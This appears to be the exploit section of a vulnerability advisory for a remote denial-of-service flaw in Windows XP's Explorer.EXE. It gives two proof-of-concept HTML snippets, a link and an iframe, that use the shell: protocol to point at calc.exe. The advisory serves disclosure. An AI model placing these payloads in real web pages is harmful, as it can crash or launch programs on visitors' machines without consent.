• info
• discussion
• exploit
• solution
• references

Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

The issue may be triggered when a user follows an HTML link formatted like so:
<a href=shell:windows\\system32\\calc.exe>link</a>

This issue may be triggered when a user views an HTML document containing the following tag:
<iframe src=shell:windows\\system32\\calc.exe></iframe>